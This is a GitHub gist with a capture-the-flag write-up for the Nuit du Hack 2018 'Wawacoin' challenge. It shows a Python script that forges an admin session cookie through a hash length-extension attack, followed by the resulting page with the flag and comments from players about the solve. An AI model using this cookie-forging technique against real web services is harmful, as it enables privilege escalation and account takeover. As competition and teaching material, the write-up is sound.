Skip to content

Instantly share code, notes, and snippets.

Last active April 2, 2018 04:21
Show Gist options
  • Save becojo/17dbd49b5e8f25d9d7534afc2ed76c64 to your computer and use it in GitHub Desktop.
Save becojo/17dbd49b5e8f25d9d7534afc2ed76c64 to your computer and use it in GitHub Desktop.
Nuit du hack CTF quals 2018 - Wawacoin
import requests
from hashpumpy import hashpump
url = ''
data = '757365723d64656d6f'.decode('hex')
signature = '9183ff6055a46981f2f71cd36430ed3d9cbf6861'
(m2_s, m2) = hashpump(signature, data, "&user=admin", 16)
session = m2.encode('hex') + '|' + m2_s
print requests.get(url, cookies={'session': session}, allow_redirects=False).content
<!doctype html>
<html lang="en">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>Wawacoin - THE FLAG IS HERE ! FLAG ON THIS PAGE FLAAAAG</title>
<!-- Bootstrap core CSS -->
<link href="/static/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="/static/css/wawacoin.css" rel="stylesheet">
<link href="/static/css/fontawesome-all.min.css" rel="stylesheet">
<div class="container">
<header class="masthead">
<h3 class="text-muted">Wawacoin</h3>
<nav class="navbar navbar-expand-md navbar-light bg-light rounded mb-3">
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
<div class="collapse navbar-collapse" id="navbarCollapse">
<ul class="navbar-nav text-md-center nav-justified w-100">
<li class="nav-item active">
<a class="nav-link" href="/">Home</a>
<li class="nav-item">
<a class="nav-link" href="/register">Registration</a>
<li class="nav-item">
<a class="nav-link" href="/logout">Logout (admin)</a>
<main role="main">
<div class="jumbotron">
<h1>Congratz. You stole all my BaitCoins. The flag is <b>NDH{c7774051db4b880da67598770c955ff99363e76d}</b>.</h1>
<!-- Site footer -->
<footer class="footer">
<p>&copy; Wawacoin - <b>Kernel Redirection @0x79797979</b></p>
</div> <!-- /container -->
<script src="/static/js/jquery-3.2.1.min.js"></script>
<script src="/static/js/bootstrap.min.js"></script>
<script src="/static/js/Chart.bundle.min.js"></script>
<script src="/static/js/wawacoin.js"></script>
<!-- <script src="/js/wawacoin-miner.js">miner_start('CR1n0YrCANNoGM1GNiSS3uGstI');</script> (This is not the flag.) !-->
Copy link

BookGin commented Apr 1, 2018

We spent almost 6+ hours hashpumping the session to the wrong url....... (/login and /stealmoney) 😢

By the way, the HTML comment CR1n0YrCANNoGM1GNiSS3uGstI can be reversed, which means It's guessing 1M gonna cry on IRC.

Copy link

becojo commented Apr 1, 2018

@BookGin If you do it on /login it redirects you to /manager where the flag is 🤔

Copy link

BookGin commented Apr 2, 2018

@becojo We only check the reponse status code and content, unfortunately.

Thanks for your writeup!
(BTW, it seems that we both attended DefCamp CTF Finals last year 😄 )

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment